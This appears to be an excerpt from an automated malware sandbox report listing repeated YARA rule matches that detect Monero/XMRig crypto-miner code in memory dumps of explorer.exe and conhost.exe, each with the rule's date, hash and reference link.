              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
